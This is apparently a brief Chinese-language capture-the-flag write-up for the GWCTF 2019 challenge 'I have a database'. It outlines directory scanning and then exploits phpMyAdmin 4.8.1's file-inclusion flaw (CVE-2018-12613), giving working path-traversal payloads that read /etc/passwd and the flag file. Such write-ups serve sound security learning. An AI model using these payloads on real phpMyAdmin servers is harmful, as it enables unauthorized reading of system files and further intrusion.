GWCTF 2019-我有一个数据库
像这种什么也没有告诉的题目,一般先去看一看robots.txt,还是没有就githack,dirsearch一下,一般总会给点什么东西的。
再不然就御剑扫呗
一般先注意版本,然后去找有什么爆出的漏洞可以利用
这里phpmyadmin4.8.1确实有可以利用的
phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)
漏洞利用
payload
?target=db_sql.php%253f/../../../../../../../../etc/passwd
可以正常包含文件,读取flag
?target=db_sql.php%253f/../../../../../../../../flag